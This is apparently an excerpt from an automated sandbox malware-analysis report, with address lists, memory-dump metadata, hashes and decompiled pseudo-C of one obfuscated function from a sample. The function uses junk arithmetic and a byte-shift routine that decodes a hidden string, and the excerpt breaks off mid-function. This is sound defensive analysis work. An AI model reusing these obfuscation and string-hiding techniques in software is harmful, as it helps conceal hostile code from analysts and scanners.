                                              0x00ec6548
                                              0x00ec6549
                                              0x00ec6556
                                              0x00ec6568
                                              0x00ec656c
                                              0x00ec657f
                                              0x00ec6594
                                              0x00ec6594
                                              0x00ec65a3
                                              0x00ec65af
                                              0x00ec65b5
                                              0x00ec66c2
                                              0x00ec66cb
                                              0x00ec66ce
                                              0x00ec66dd
                                              0x00ec66e0
                                              0x00ec66eb
                                              0x00ec6700
                                              0x00ec6706
                                              0x00ec670c
                                              0x00ec670c
                                              0x00ec65bb
                                              0x00ec65c3
                                              0x00ec65c6
                                              0x00ec65cb
                                              0x00ec65d1
                                              0x00ec65d6
                                              0x00ec65dc
                                              0x00ec65fd
                                              0x00ec6600
                                              0x00ec6603
                                              0x00ec6604
                                              0x00ec660a
                                              0x00ec661d
                                              0x00ec661d
                                              0x00ec661d
                                              0x00ec660c
                                              0x00ec660c
                                              0x00ec6616
                                              0x00ec6616
                                              0x00ec660e
                                              0x00ec660e
                                              0x00ec6614
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6614
                                              0x00ec660c
                                              0x00ec662b
                                              0x00ec6634
                                              0x00ec6636
                                              0x00ec6643
                                              0x00ec664d
                                              0x00ec6651
                                              0x00ec665c
                                              0x00ec6675
                                              0x00ec667a
                                              0x00ec6686
                                              0x00ec66a0
                                              0x00ec66b3
                                              0x00ec66b3
                                              0x00ec65de
                                              0x00ec65de
                                              0x00ec65ee
                                              0x00ec65f5
                                              0x00ec65e0
                                              0x00ec65e0
                                              0x00ec65e6
                                              0x00ec65ec
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec65ec
                                              0x00ec65de
                                              0x00ec65dc
                                              0x00ec65cb
                                              0x00ec6711
                                              0x00ec6717
                                              0x00ec6721
                                              0x00ec6727
                                              0x00ec6728
                                              0x00ec6729
                                              0x00ec672b
                                              0x00ec673a
                                              0x00ec673a
                                              0x00ec6733
                                              0x00ec6733
                                              0x00ec6733
                                              0x00ec6746
                                              0x00ec674b
                                              0x00ec6793
                                              0x00ec6796
                                              0x00ec674d
                                              0x00ec675a
                                              0x00ec6764
                                              0x00ec6767
                                              0x00ec676a
                                              0x00ec676e
                                              0x00ec677a
                                              0x00ec677b
                                              0x00ec677c
                                              0x00ec6780
                                              0x00ec6780
                                              0x00ec679f
                                              0x00ec67a5
                                              0x00ec67b1
                                              0x00ec67bf
                                              0x00ec67c5
                                              0x00ec67cd
                                              0x00ec67cd
                                              0x00ec6822
                                              0x00ec682e
                                              0x00ec6847
                                              0x00ec684d
                                              0x00ec6854
                                              0x00ec685b
                                              0x00ec6862
                                              0x00ec6869
                                              0x00ec6870
                                              0x00ec6877
                                              0x00ec687e
                                              0x00ec6885
                                              0x00ec688c
                                              0x00ec6893
                                              0x00ec689a
                                              0x00ec68a1
                                              0x00ec68b0
                                              0x00ec68b0
                                              0x00ec68bc
                                              0x00ec68d1
                                              0x00ec68da
                                              0x00ec68dd
                                              0x00ec68de
                                              0x00ec68e0
                                              0x00ec68f5
                                              0x00ec68f5
                                              0x00ec68f5
                                              0x00ec68e2
                                              0x00ec68e2
                                              0x00ec68ee
                                              0x00ec68ee
                                              0x00ec68e4
                                              0x00ec68ea
                                              0x00ec68ec
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec68ec
                                              0x00ec68e2
                                              0x00ec68f9
                                              0x00ec68fb
                                              0x00ec690a
                                              0x00ec6910
                                              0x00ec6928
                                              0x00ec6931
                                              0x00ec693c
                                              0x00ec694b
                                              0x00ec6956
                                              0x00ec6956
                                              0x00ec695b
                                              0x00ec695b
                                              0x00ec68fd
                                              0x00ec68fd
                                              0x00ec68fd
                                              0x00ec68be
                                              0x00ec68be
                                              0x00ec68c8
                                              0x00ec68c8
                                              0x00ec6962
                                              0x00ec696c
                                              0x00ec6976
                                              0x00ec6981
                                              0x00ec6989
                                              0x00ec698f
                                              0x00ec699c
                                              0x00ec699e
                                              0x00ec69a2
                                              0x00ec69a8
                                              0x00ec69b2
                                              0x00ec69b4
                                              0x00ec69b4
                                              0x00ec69d7
                                              0x00ec69dd
                                              0x00ec69e3
                                              0x00ec6a02
                                              0x00ec6a20
                                              0x00ec6a35
                                              0x00ec6a3d
                                              0x00ec6a3d
                                              0x00ec6a66
                                              0x00ec6a68
                                              0x00ec6a6f
                                              0x00ec6a76
                                              0x00ec6a80
                                              0x00ec6a86
                                              0x00ec6a8f
                                              0x00ec6a95
                                              0x00ec6aa3
                                              0x00ec6aac
                                              0x00ec6ab2
                                              0x00ec6aba
                                              0x00ec6abc
                                              0x00ec6b8a
                                              0x00ec6b91
                                              0x00ec6ba3
                                              0x00ec6ba8
                                              0x00ec6bae
                                              0x00ec6bb5
                                              0x00ec6bb5
                                              0x00ec6bbb
                                              0x00ec6ac2
                                              0x00ec6ac5
                                              0x00ec6ace
                                              0x00ec6ae0
                                              0x00ec6ae9
                                              0x00ec6af2
                                              0x00ec6af2
                                              0x00ec6aeb
                                              0x00ec6aeb
                                              0x00ec6aeb
                                              0x00ec6af7
                                              0x00ec6aff
                                              0x00ec6b08
                                              0x00ec6b08
                                              0x00ec6b01
                                              0x00ec6b01
                                              0x00ec6b01
                                              0x00ec6b1f
                                              0x00ec6b2f
                                              0x00ec6b32
                                              0x00ec6b34
                                              0x00ec6b3c
                                              0x00ec6b3e
                                              0x00ec6b41
                                              0x00ec6b49
                                              0x00ec6b57
                                              0x00ec6b65
                                              0x00ec6b6b
                                              0x00ec6b6e
                                              0x00ec6b76
                                              0x00ec6b76
                                              0x00ec6ac5
                                              0x00ec6bc2
                                              0x00ec6bc8
                                              0x00ec6bcf
                                              0x00ec6bd5
                                              0x00ec6bdc
                                              0x00ec6be3
                                              0x00ec6bef
                                              0x00ec6bf6
                                              0x00ec6bfc
                                              0x00ec6c05
                                              0x00ec6c0c
                                              0x00ec6c12
                                              0x00ec6c1a
                                              0x00ec6c26
                                              0x00ec6c2c
                                              0x00ec6c31
                                              0x00ec6c35
                                              0x00ec6c35
                                              0x00ec6c38
                                              0x00ec6c48
                                              0x00ec6c4b
                                              0x00ec6c54
                                              0x00ec6c59
                                              0x00ec6c60
                                              0x00ec6c60
                                              0x00ec6c63
                                              0x00ec6c69
                                              0x00ec6c74
                                              0x00ec6ca8
                                              0x00ec6cae
                                              0x00ec6cb1
                                              0x00ec6cb2
                                              0x00ec6cb4
                                              0x00ec6cba
                                              0x00ec6cd5
                                              0x00ec6ce9
                                              0x00ec6cf7
                                              0x00ec6cfd
                                              0x00ec6d05
                                              0x00ec6d0b
                                              0x00ec6cb6
                                              0x00ec6cb6
                                              0x00ec6cb8
                                              0x00ec6d19
                                              0x00ec6d19
                                              0x00ec6d1d
                                              0x00ec6d1d
                                              0x00ec6d1f
                                              0x00ec6d24
                                              0x00ec6d27
                                              0x00ec6d2e
                                              0x00ec6d2f
                                              0x00ec6d2f
                                              0x00ec6d30
                                              0x00ec6d34
                                              0x00ec6d35
                                              0x00ec6d3b
                                              0x00ec6d40
                                              0x00ec6d4d
                                              0x00ec6d50
                                              0x00ec6d5e
                                              0x00ec6d64
                                              0x00ec6d64
                                              0x00ec6d66
                                              0x00ec6d6d
                                              0x00ec6d6e
                                              0x00ec6d6e
                                              0x00ec6d71
                                              0x00ec6d73
                                              0x00ec6d75
                                              0x00ec6d75
                                              0x00ec6d75
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6cb8
                                              0x00ec6c76
                                              0x00ec6c7d
                                              0x00ec6c83
                                              0x00ec6c86
                                              0x00ec6c8d
                                              0x00ec6c98
                                              0x00ec6c9d
                                              0x00ec6c9d
                                              0x00ec6c74
                                              0x00ec6e5d
                                              0x00ec6e65
                                              0x00ec6e66
                                              0x00ec6e6f
                                              0x00ec6e7d
                                              0x00ec6e87
                                              0x00ec6e8d
                                              0x00ec6e94
                                              0x00ec6e9d
                                              0x00ec6ea2
                                              0x00ec6ea9
                                              0x00ec6eab
                                              0x00ec6f65
                                              0x00ec6f6b
                                              0x00ec6f6d
                                              0x00ec6f76
                                              0x00ec6f76
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f7e
                                              0x00ec6f7e
                                              0x00ec6f82
                                              0x00ec6eb1
                                              0x00ec6eb4
                                              0x00ec6ebd
                                              0x00ec6ed4
                                              0x00ec6ef3
                                              0x00ec6efa
                                              0x00ec6f03
                                              0x00ec6f09
                                              0x00ec6f0c
                                              0x00ec6f22
                                              0x00ec6f23
                                              0x00ec6f26
                                              0x00ec6f26
                                              0x00ec6f2b
                                              0x00ec6f36
                                              0x00ec6f37
                                              0x00ec6f4a
                                              0x00ec6f56
                                              0x00ec6f59
                                              0x00ec6f59
                                              0x00ec6eb4
                                              0x00ec6fa9
                                              0x00ec6fb0
                                              0x00ec6fb5
                                              0x00ec6fb5
                                              0x00ec6fb8
                                              0x00ec6fb9
                                              0x00ec6fd4
                                              0x00ec6fd6
                                              0x00ec6fdc
                                              0x00ec6fe3
                                              0x00ec6fe3
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6ff6
                                              0x00ec6ff9
                                              0x00ec7002
                                              0x00ec7009
                                              0x00ec7013
                                              0x00ec701a
                                              0x00ec701e
                                              0x00ec7025
                                              0x00ec7027
                                              0x00ec7027
                                              0x00ec7035
                                              0x00ec703c
                                              0x00ec704a
                                              0x00ec704b
                                              0x00ec7050
                                              0x00ec705d
                                              0x00ec7081
                                              0x00ec7084
                                              0x00ec7085
                                              0x00ec708b
                                              0x00ec708b
                                              0x00ec7091
                                              0x00ec7091
                                              0x00ec7097
                                              0x00ec7097
                                              0x00ec7872
                                              0x00ec7872
                                              0x00ec7880

                                              APIs
                                              • TlsGetValue.KERNEL32(00000001), ref: 00EC6274
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.423883840.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                              • Associated: 00000000.00000002.423879545.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424170838.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424177261.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424207782.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ec0000_5GPueTFF2S.jbxd
                                              Similarity
                                              • API ID: Value
                                              • String ID: %GR$RPSQ8~$S$j
                                              • API String ID: 3702945584-3363877662
                                              • Opcode ID: 31fbb02f297ac77399f534ae62f581c53e40b8f2d1f7a17a160e4b3a84b0f9f3
                                              • Instruction ID: 2b82831984f1bf0c26adf0109aa26972b5c1dd320f4a7b08dcb7d6a0bb0cf818
                                              • Opcode Fuzzy Hash: 31fbb02f297ac77399f534ae62f581c53e40b8f2d1f7a17a160e4b3a84b0f9f3
                                              • Instruction Fuzzy Hash: 3142D5309042598FCB25CF68D591FFEBBB2FB59340F1491AEE489A734DDA3A4942CB11
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00EC6072 Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 602COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 84%
                                              			E00EC6072(void* __eax, signed int __ebx) {
				signed int _t323;
				signed char _t328;
				signed short _t329;
				signed int _t334;
				signed short _t359;
				signed short _t360;
				intOrPtr _t371;
				signed int _t372;
				void* _t380;
				signed int _t392;
				signed int _t393;
				signed int _t395;
				signed int _t398;
				signed short _t401;
				signed int _t405;
				signed int _t411;
				intOrPtr _t412;
				signed int _t413;
				signed int _t415;
				signed int _t418;
				signed short _t419;
				void* _t421;
				void* _t424;
				void* _t430;
				WCHAR* _t433;
				signed char _t439;
				signed short _t447;
				signed short _t463;
				signed int _t473;
				signed int _t479;
				signed int _t481;
				signed short _t482;
				signed int _t488;
				signed int _t512;
				signed int _t538;
				signed short _t546;
				signed int _t548;
				signed int _t578;
				intOrPtr _t582;
				signed int _t584;
				signed int _t597;
				signed int _t601;
				signed int _t610;
				signed int _t612;
				signed int _t614;
				signed int _t629;
				signed int _t631;
				signed int _t633;
				signed int _t638;
				signed short _t639;
				signed int _t661;
				signed int _t673;
				signed int _t676;
				char _t685;
				signed int _t689;
				signed int _t698;
				signed int _t704;
				signed int _t705;
				signed int _t720;
				signed int _t722;
				signed int _t726;
				intOrPtr _t731;
				signed int _t732;
				signed int _t733;
				signed short _t736;
				signed int _t744;
				signed int _t748;
				signed int _t750;
				signed int _t753;
				signed int _t759;
				signed int _t770;
				WCHAR* _t771;
				signed int _t779;
				signed int _t780;
				signed int _t790;
				signed int _t801;
				signed int _t804;
				signed int _t805;
				signed int _t808;
				signed int _t835;
				signed int _t850;
				signed int _t854;
				intOrPtr _t860;
				signed int _t862;
				signed int _t863;
				signed int _t864;
				void* _t869;
				void* _t876;
				void* _t877;
				signed int _t882;
				void* _t889;
				void* _t890;
				void* _t891;
				void* _t911;

				_t538 = __ebx;
				_t698 =  *0x1215420;
				 *(_t869 - 0x20) = _t698;
				 *(_t869 - 0xb4) =  *(_t869 - 0x20) + 0x276;
				if( *0x1000c9b != 0 || ( *0x1000c83 & 0x000000ff) >  *(_t869 - 0x90)) {
					__eflags =  *(_t869 - 0xc) -  *(_t869 - 5);
					if( *(_t869 - 0xc) <=  *(_t869 - 5)) {
						_t546 = 0;
						__eflags = 0;
					} else {
						_t546 = 1;
					}
					asm("cdq");
					asm("adc edx, [0x1000d14]");
					__eflags = ( *0x1000c98 & 0x0000ffff) +  *0x1000d10 - _t546;
					if(( *0x1000c98 & 0x0000ffff) +  *0x1000d10 != _t546) {
						L12:
						_t323 = 0;
						__eflags = 0;
					} else {
						__eflags = _t698;
						if(_t698 != 0) {
							goto L12;
						} else {
							_t323 = 1;
						}
					}
					__eflags =  *0x1000cf8 - _t538;
					 *(_t869 - 0xa8) = _t538;
					_t548 = 0 |  *0x1000cf8 == _t538;
					__eflags = _t548 -  *(_t869 - 0x28);
					asm("sbb ecx, ecx");
					__eflags = ( *(_t869 - 3) & 0x000000ff) - _t548 + 1;
					__eflags = _t323 - (0 | ( *(_t869 - 3) & 0x000000ff) - _t548 + 0x00000001 < 0x00000000);
					_t538 =  *(_t869 - 0xa8);
					if(__eflags != 0) {
						__eflags =  *(_t869 - 0x8c);
						_t704 =  *(_t869 - 0x8c) - (0 |  *(_t869 - 0x8c) == 0x00000000);
						__eflags = _t704;
						if(__eflags != 0) {
							 *0x1000ca0 =  *0x1215420;
							asm("cdq");
							 *0x1000cbc = _t704;
							_t704 =  *0x1000ce8;
							_t689 = ( *(_t869 - 0xe) & 0x000000ff) * _t704;
							__eflags = _t689;
							 *0x1000cb8 =  *0x1000c9a - 0x20f4;
							 *(_t869 - 0xe) = _t689;
						}
					} else {
						 *(_t869 - 0x18) =  *0x1000ca4 - ( *(_t869 - 0xb) & 0xff);
						asm("cdq");
						 *0x1000cf0 =  *0x1000cf0 - ( *(_t869 - 9) & 0x000000ff);
						asm("sbb [0x1000cf4], edx");
						_t704 =  *(_t869 - 0x64);
						 *0x1000c94 =  *(_t869 - 0x68) + 0xbfc4;
						 *(_t869 - 0x6c) = ( *(_t869 - 0xa) & 0xff) * 0x9564;
					}
				} else {
					 *(_t869 - 0x28) =  *0x1000cd2 + 0xd71b;
					 *(_t869 - 0x24) =  *(_t869 - 0x24) - 1;
					 *(_t869 - 0xb) = ( *(_t869 - 0xb) & 0x000000ff) +  *0x1000c9e - ( *(_t869 - 0xb) & 0xff);
					_t704 = ( *(_t869 - 5) & 0x000000ff) + ( *(_t869 - 5) & 0x000000ff &  *0x1000cd8);
					 *(_t869 - 5) = _t704;
				}
				 *(_t869 - 0xac) =  *(_t869 - 0x20) + 0x2e4;
				_t328 =  *(_t869 - 1);
				asm("cdq");
				_t876 = _t328 -  *0x1000d10; // 0x0
				if(_t876 != 0) {
					L19:
					_t329 = 1;
				} else {
					_t877 = _t704 -  *0x1000d14; // 0x0
					if(_t877 == 0) {
						_t329 = 0;
						__eflags = 0;
					} else {
						goto L19;
					}
				}
				_t705 =  *(_t869 - 1);
				if(_t329 > (0 | _t705 != 0x00000030)) {
					asm("cdq");
					asm("sbb esi, edx");
					asm("cdq");
					__eflags =  *0x1000d10 - ( *(_t869 - 0x18) & 0x0000ffff) |  *0x1000c84 |  *0x1000d14 | _t705;
					if(__eflags != 0) {
						 *(_t869 - 0x1c) =  *(_t869 - 0x38) *  *(_t869 - 0x1c);
						 *(_t869 - 0x28) = 0x3090bb2d;
						_t835 =  *(_t869 - 1) + 0x23;
						__eflags = _t835;
						 *0x1000c9a = _t835;
						 *(_t869 - 0x40) = E00ECEE50( *(_t869 - 0x38),  *(_t869 - 0x34), 0x7d, _t538);
						 *(_t869 - 0x3c) = _t835;
					}
				} else {
					 *0x1000c9f = TlsGetValue( *(_t869 - 0x60));
				}
				 *(_t869 - 0xb8) =  *(_t869 - 0x20) + 0x2bc;
				 *(_t869 - 0x20) =  *0x1215420;
				 *0x1000cd0 = 0xfffff41d;
				 *0x1000cd8 = (1 -  *0x1000d18) *  *0x1000cd8;
				_t334 =  *0x1000cb8; // 0x4
				 *0x1000c94 =  *(_t869 - 0x38) * 0xdcf2d26f;
				 *(_t869 - 0x90) = _t334 & 0x00000006;
				 *(_t869 - 0x14) =  *(_t869 - 0x20) + 0x3b1;
				if( *(_t869 - 0x7c) == 0) {
					__eflags =  *0x1000ca8 |  *0x1000cac;
					if(__eflags != 0) {
						__eflags =  !( *0x1000d10) |  !( *0x1000d14);
						if(__eflags != 0) {
							 *0x1000ca4 =  *0x1000ca4 - 1;
							asm("adc ecx, [0x1000cbc]");
							 *(_t869 - 0x38) =  *(_t869 - 0x38) +  *0x1000cb8 + 0xd0056b0c;
							asm("adc ecx, 0xfff005d1");
							asm("adc eax, 0xfff765fd");
							 *0x1000ce4 =  *0x1000d04;
							 *0x1000ce0 =  *0x1000d00 + 0x1e29880a;
							asm("cdq");
							 *(_t869 - 0x38) =  *(_t869 - 0x38) -  *(_t869 - 1) + 0x10;
							asm("sbb [ebp-0x34], edx");
							_t673 = ( *(_t869 - 0xa0) +  *(_t869 - 0x18) + 2) * 0x6a +  *0x1000c98 * 0x41;
							__eflags = _t673;
							 *0x1000c83 = _t673;
						}
					} else {
						 *0x1000ca4 = ( *(_t869 - 0x68) +  *0x1000ca4) *  *0x1000ca4;
						 *(_t869 - 0x30) =  *(_t869 - 0x30) -  *(_t869 - 0x40);
						 *(_t869 - 0x24) =  *0x1000c84 + 0x6491;
					}
				} else {
					if( *(_t869 - 0x6c) != 0) {
						_t512 =  *0x1000ce0; // 0x0
						_t676 =  *0x1000ce4; // 0x0
						_t882 = _t512 ^  *0x1000d18 | _t676 ^  *0x1000d1c;
						if(_t882 == 0) {
							 *0x1000c84 = 0x78;
							 *0x1000cc8 =  *0x1000ca8 & 0x430b161a;
							 *0x1000ccc = _t538;
							 *(_t869 - 3) =  *0x1215420;
							 *(_t869 - 0x70) =  *0x1000cb4 << 4;
						} else {
							 *0x1000c88 =  *0x1000c9f + 0x60ad17c2 ^  *0x1000c94;
							_t685 =  *0x1000c9c; // -44
							 *0x1000c8c = _t538;
							 *((char*)(_t869 - 4)) =  *(_t869 - 0xd) & 0xffffff00 | _t882 == 0x00000000;
							 *(_t869 - 0x4c) = ( *0x1000c98 & 0x0000ffff) + 0x73bfbdfe;
							 *0x113d808 = _t685;
						}
					}
				}
				 *((intOrPtr*)(_t869 - 0xa4)) =  *(_t869 - 0x20) + 0x241;
				 *(_t869 - 0xc4) =  *(_t869 - 0x20) + 0x273;
				 *(_t869 - 0x20) =  *0x1215420;
				 *(_t869 - 6) = E00EC1000();
				asm("sbb ecx, ecx");
				asm("sbb edx, edx");
				if(( *(_t869 - 6) & 0x000000ff) + 1 >  *((intOrPtr*)(_t869 - 4)) + 1) {
					asm("cdq");
					 *0x1000ce0 =  *0x1000ce0;
					asm("sbb [0x1000ce4], edx");
					 *(_t869 - 0x18) =  *(_t869 - 0x70) - 0x23c803e3;
					 *(_t869 - 0x28) =  *0x1215420;
					 *0x1000cd2 = 0 - ( *(_t869 - 0xa0) ^ 0);
					 *0x1000cd8 = ( *(_t869 - 8) & 0xff) +  *(_t869 - 0x6c) + 1;
				}
				 *(_t869 - 0xa8) =  *(_t869 - 0x20) + 0x83;
				_t887 =  *(_t869 - 0xa0) |  *(_t869 - 0x9c);
				if(( *(_t869 - 0xa0) |  *(_t869 - 0x9c)) == 0) {
					asm("sbb eax, eax");
					asm("cdq");
					_t720 =  *(_t869 - 0x30) & 0x0000ffff;
					asm("cdq");
					asm("sbb edx, ebx");
					 *0x1000d18 = E00ECEE50(( ~( *(_t869 - 0x28)) + 1) * ( *(_t869 - 0x1c) & 0x0000ffff),  *(_t869 - 0x1c) & 0x0000ffff, _t720 -  *(_t869 - 0x48), _t720);
					 *0x1000d1c = _t720;
					 *0x1000cd8 = ( *0x1000c9b & 0x000000ff) - 0x23e5;
					_t538 = 0;
					__eflags = 0;
				} else {
					 *(_t869 - 0x4c) = E00EC1370(_t887) & 0x000000ff;
					_t805 =  *(_t869 - 0x4c);
					if(_t805 <= 0) {
						_t479 =  *0x1000cac; // 0x106b42
						_t889 = _t479 -  *0x1000c8c; // 0xfff500a5
						if(_t889 > 0) {
							L42:
							_t481 =  *(_t869 - 0xa) & 0x000000ff;
							asm("cdq");
							__eflags = _t805 -  *0x1000d14;
							if(__eflags < 0) {
								L46:
								_t482 = 0;
								__eflags = 0;
							} else {
								if(__eflags > 0) {
									L45:
									_t482 = 1;
								} else {
									__eflags = _t481 -  *0x1000d10;
									if(_t481 <=  *0x1000d10) {
										goto L46;
									} else {
										goto L45;
									}
								}
							}
							 *(_t869 - 8) =  *0x1000c90 - ( *(_t869 - 8) == 0);
							__eflags = _t482 - ( *0x1000c90 ==  *(_t869 - 8) == 0);
							if(_t482 <= ( *0x1000c90 ==  *(_t869 - 8) == 0)) {
								_t808 =  *0x1215420;
								 *(_t869 - 0x80) = _t808;
								asm("cdq");
								asm("cdq");
								_t488 = E00ECEE50(E00ECEE50( *(_t869 - 0x24), _t808, ( *0x1000cd4 & 0x0000ffff) + 0x43, _t808), _t808,  *0x1000d18,  *0x1000d1c);
								 *0x1000ce4 = _t808;
								 *0x1000ce0 = _t488;
								 *(_t869 - 0x88) = (( *(_t869 - 3) & 0x000000ff) - ( *(_t869 - 6) & 0x000000ff)) *  *0x1000d18;
								 *(_t869 - 0x2c) = ( *(_t869 - 0x84) & 0x0000ffff) - 0x86;
							}
						} else {
							if(_t889 < 0) {
								L41:
								 *(_t869 - 2) =  *(_t869 - 0x80) - 0x6b;
							} else {
								_t661 =  *0x1000ca8; // 0x7b8b5249
								_t890 = _t661 -  *0x1000c88; // 0xa666078f
								if(_t890 > 0) {
									goto L42;
								} else {
									goto L41;
								}
							}
						}
					}
				}
				_t722 =  *(_t869 - 0x20) + 0x373;
				 *(_t869 - 0xb8) = _t722;
				_t860 =  *((intOrPtr*)(_t869 - 0x58));
				_t359 =  *(_t869 - 0x30);
				asm("cdq");
				_t891 = _t722 -  *((intOrPtr*)(_t869 - 0x54));
				if(_t891 > 0 || _t891 >= 0 && _t359 > _t860) {
					_t360 = 0;
					__eflags = 0;
				} else {
					_t360 = 1;
				}
				_t724 = 0 |  *(_t869 - 0x30) - 0x00000054 <= 0x00000000;
				if(_t360 <  *(_t869 - 0x30) - 0x54 <= 0) {
					 *(_t869 - 9) =  *0x1000cd0;
					 *0x1000ca4 =  *0x1000cb4;
				} else {
					asm("cdq");
					 *(_t869 - 0x48) =  *(_t869 - 0x48) - E00ECEE50( *(_t869 - 0x48),  *((intOrPtr*)(_t869 - 0x44)),  *0x1000c9c, _t724);
					asm("sbb [ebp-0x44], edx");
					 *(_t869 - 0xc) = 0x53;
					_t804 =  *(_t869 - 0x24);
					asm("cdq");
					 *0x1000cc0 = _t804 - 0xff34;
					asm("ror byte [eax+eax], 0x1");
					 *0x1000cc4 = _t804;
				}
				_t726 =  *(_t869 - 0x20) + 0x117;
				 *(_t869 - 0xb8) = _t726;
				 *0x1000ca4 = E00EC1700();
				asm("cdq");
				asm("adc edx, 0xcae43");
				if(( !( *0x1000c9f) + 0x0dc8da25 | _t726) != 0) {
				}
				if( *(_t869 - 0xa8) != 0x3b0) {
					 *(_t869 - 0x6c) =  *(_t869 - 0x6c) &  *0x1109ef0;
					 *(_t869 - 0x88) =  *(_t869 - 0x88) -  *(_t869 - 0x78) &  *(_t869 - 0x88);
					 *((char*)(_t869 - 0xfc)) = 0x97;
					 *((char*)(_t869 - 0xfb)) = 0xaf;
					 *((char*)(_t869 - 0xfa)) = 0xb7;
					 *((char*)(_t869 - 0xf9)) = 0xb9;
					 *((char*)(_t869 - 0xf8)) = 0xbc;
					 *((char*)(_t869 - 0xf7)) = 0xc3;
					 *((char*)(_t869 - 0xf6)) = 0x6a;
					 *((char*)(_t869 - 0xf5)) = 0xb0;
					 *((char*)(_t869 - 0xf4)) = 0xab;
					 *((char*)(_t869 - 0xf3)) = 0xbf;
					 *((char*)(_t869 - 0xf2)) = 0xb6;
					 *((char*)(_t869 - 0xf1)) = 0xbe;
					_t862 = 0;
					do {
						_t578 =  *0x1000cc0; // 0xffff970a
						if((_t578 |  *0x1000cc4) == 0) {
							_t731 =  *((intOrPtr*)(_t869 - 7));
							_t371 = _t731;
							asm("cdq");
							__eflags =  *0x1000cbc - _t731;
							if(__eflags < 0) {
								L71:
								_t372 = 0;
								__eflags = 0;
							} else {
								if(__eflags > 0) {
									L70:
									_t372 = 1;
								} else {
									__eflags =  *0x1000cb8 - _t371;
									if( *0x1000cb8 <= _t371) {
										goto L71;
									} else {
										goto L70;
									}
								}
							}
							__eflags =  !_t372;
							if( !_t372 == 0) {
								__eflags =  *0x1000ce0 |  *0x1000ce4;
								if(( *0x1000ce0 |  *0x1000ce4) != 0) {
									_t801 =  *(_t869 - 0x70) &  *0x1000ce0;
									 *0x1000ce0 = E00ECEE50(_t801, 0 &  *0x1000ce4,  *0x1000ce0,  *0x1000ce4);
									 *0x1000ce4 = _t801;
									 *0x1000cd8 =  *(_t869 - 0x40) * 0xffffe4ed;
									_t473 =  *0x1000d20 & 0xffffb755;
									__eflags = _t473;
									 *(_t869 - 0x5c) = _t473;
								}
							} else {
								 *0x1000c84 =  *0x1000c84 + 1;
							}
						} else {
							 *0x1000c84 = 0x9b;
							 *(_t869 - 8) = 1;
						}
						_t732 =  *0x1000d08;
						_t582 =  *0x1000cf4; // 0x2b91c
						asm("cdq");
						_t733 =  *0x1000cf0; // 0xd43579fe
						 *(_t869 - 0xa8) = _t732;
						_t380 = E00ECEE50(_t733, _t582, 0x1faed387, _t538);
						asm("sbb edx, edi");
						_t538 = 0;
						 *0x1000cf4 = 0;
						 *0x1000cf0 = 1;
						if((_t380 -  !( *(_t869 - 2) ^ _t732) | _t733) != 0) {
							 *0x1000cf0 = 0;
						}
						_t584 =  *0x1000ca4; // 0x9b27
						 *0x1000c90 = 0xb8f675f1 - ( *(_t869 - 1) & 0x000000ff);
						_t736 =  *0x1000cdc; // 0x84521e70
						_t862 = _t862 + 1;
						 *0x1000d10 = ( *(_t869 - 1) & 0x000000ff) *  *(_t869 - 0x6c) * ( *0x1000d08 - (0 | ( *(_t869 - 0x24) & 0x0000ffff) == 0x00000000)) * ((( *0x1000c83 & 0x000000ff) + 1) *  *0x1000cb4 +  !(_t584 + _t736));
						 *(_t869 + _t862 * 2 - 0x1ae) = ( *(_t869 + _t862 - 0xfd) & 0x000000ff) - 0x0000004a & 0x000000ff;
						 *0x1000d14 = _t538;
					} while (_t862 < 0xc);
					_t744 = 0x92 - ( *(_t869 - 0xac) ^  *(_t869 - 0xb4));
					_t392 = M01000CB0; // 0x0
					 *(_t869 - 0x194) = _t744;
					 *0x1000cc0 = 2;
					 *0x1000cc4 = _t538;
					_t393 = E00ECEE50(_t392, _t538, 0xbe790e28, 0x61b36);
					 *0x1000d1c = _t744;
					 *0x1000d18 = _t393;
					_t395 =  *0x1000cc0; // 0xffff970a
					_t597 =  *0x1000cc4; // 0xffffffff
					 *0x1000c94 =  *(_t869 - 0x1c) +  *(_t869 - 1) + 1;
					_t748 = _t395 | _t597;
					if(_t748 == 0) {
						_t750 = 1 -  *(_t869 - 0x78);
						asm("sbb eax, ecx");
						_t398 = E00ECEE50(_t750, 0,  *0x1000ca8,  *0x1000cac);
						 *0x1000cac = _t750;
						_t748 =  *0x1000c83 & 0x000000ff;
						M01000CB0 = M01000CB0 ^ _t748;
						__eflags = M01000CB0;
						 *0x1000ca8 = _t398;
					} else {
						if(_t395 != 1 || _t597 != _t538) {
							if(_t395 == 2 && _t597 == _t538) {
								 *(_t869 - 0xbc) = _t538;
								if( *(_t869 - 0x24) != 0) {
									_t639 = 0;
									__eflags = 0;
								} else {
									_t639 = 1;
								}
								 *(_t869 - 0xbc) = _t538;
								if( *(_t869 - 0xb) != 0) {
									_t463 = 0;
									__eflags = 0;
								} else {
									_t463 = 1;
								}
								 *(_t869 - 0x18) = ( *(_t869 - 0x78) - _t639) *  *0x1000d10 * _t463;
								asm("cdq");
								asm("sbb esi, edx");
								_t748 =  *(_t869 - 0x48);
								asm("sbb esi, eax");
								 *(_t869 - 0x48) =  *(_t869 - 0x48) -  *((intOrPtr*)(_t869 - 7)) - _t748;
							}
						} else {
							 *0x1000d18 =  *0x1215420;
							 *0x1000d1c = _t538;
